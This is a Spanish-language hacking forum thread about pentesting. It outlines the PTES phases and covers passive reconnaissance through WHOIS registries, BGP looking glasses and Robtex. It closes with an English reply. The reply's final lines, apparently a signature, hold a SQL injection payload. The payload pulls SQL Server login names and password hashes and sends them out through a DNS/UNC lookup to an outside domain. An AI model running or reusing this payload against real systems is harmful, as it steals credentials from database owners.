[WP] Pentesting

Iniciado por ANTRAX, Enero 25, 2017, 10:54:19 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.


El tema del día de hoy para debatir por WhatsApp es: Pentesting
Dejo este post para debatir acerca de este tema.

Saludos,
ANTRAX


Hola Comunidad. Voy a explicar mas bien poco de este tema que es larguisimo pero muy interesante para todos nosotros xD.
Me voy a centrar por lo menos ahora en la primeras fases del Pentesting que es footprinting y reconoissance en castellano (identificación y reconocimiento).
Primero voy a citar la metodologia de Pentesting y explicare la metadologia principal para mi de Pentest es
Ver link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Esta es el standart puro para mi de Pentest!.



El proceso estandar de Pentest son 7 etapas:
Las siguientes son las secciones principales definidas por la norma como base para la ejecución de las pruebas de penetración:

1)- Interacciones de pre-interacción
2)- La recogida de información
3)- Modelado de amenazas
4)- Análisis de Vulnerabilidad
5)- Explotación
6)- Post Explotación
7)- Informes

Para ver todo este estandar esta en en este link todas las tools y tecnicas de cada etapa en particular, leer obligatoriamente como la biblia jeje  ;D este link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Ahora les hablare de dos tools que sirven para el analis online del BGP,  Whois. Vamos a definir antes que es lo que llamamos a lo anterior:

Para footprinting externo, primero necesitamos determinar cuál de los servidores WHOIS contiene la información que buscamos. Dado que debemos conocer el TLD para el dominio de destino, simplemente tenemos que localizar al Registrador con el que está registrado el dominio de destino.
La información WHOIS se basa en una jerarquía arbórea. ICANN (IANA) es el registro autoritario para todos los TLD y es un gran punto de partida para todas las consultas WHOIS manuales.
Búsqueda de WHOIS
ICANN - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
IANA - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
NRO - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
AFRINIC - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
APNIC - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
ARIN - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
LACNIC - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
RIPE - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una vez que se consultó al Registrador apropiado, podemos obtener la información del Registrante. Hay numerosos sitios que ofrecen información WHOIS; Sin embargo, para obtener mayor precisión en la documentación, debe usar sólo el Registrador adecuado.
InterNIC - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta]
Looking glasses BGP
Es posible identificar el número de sistema autónomo (ASN) para las redes que participan en el protocolo de la entrada de la frontera (BGP). Desde BGP rutas de ruta se anuncian en todo el mundo podemos encontrar estos mediante el uso de un BGP4 y BGP6 espejo.
BGP4 - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
BPG6 - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Las tools online que menciono ahora todos la debeis saber es Robtex y una web muy buena que tiene app para android y ios que es: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Esta tambien muy buena la de esta ultima por que uno la visita y te aparece estos datos de tu conexion xD.

Welcome to the Hurricane Electric BGP Toolkit.

You are visiting from 192.168.0.1 Argentina

Announced as 192.168.0.0/23 (.....) Argentina

Your ISP is AS.... (.......)
He omitido mis datos obvio...
Una vez ahi se puede ver con graficos los datos del sistema autonomo o AS por el que estamos conectados y un whois a nuestro ISP }:)
Eso entre varios cosas mas que podes jugar xD.

La otra tool excelente online es Robtex link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Robtex es un excelente buscador de datos como DNS IPS y AS y rutas.
Espero que les haya gustado pero por poco tiempo no expondre mas. A menos que suene la hinchada under por otro post  ;D
Espero sus comentarios y saludos.
Rootkit_Pentester

Gpentest-standard is like owasp pentest guide... or another ...
for example in OWASP pentest guide you can see similar things like recon :)!





I mean, we can found a lot of 'ways' to execute a penetration testing well... will depends of the devices, area, deadline, risks, etc.

good job btw
1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.undisclosure.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--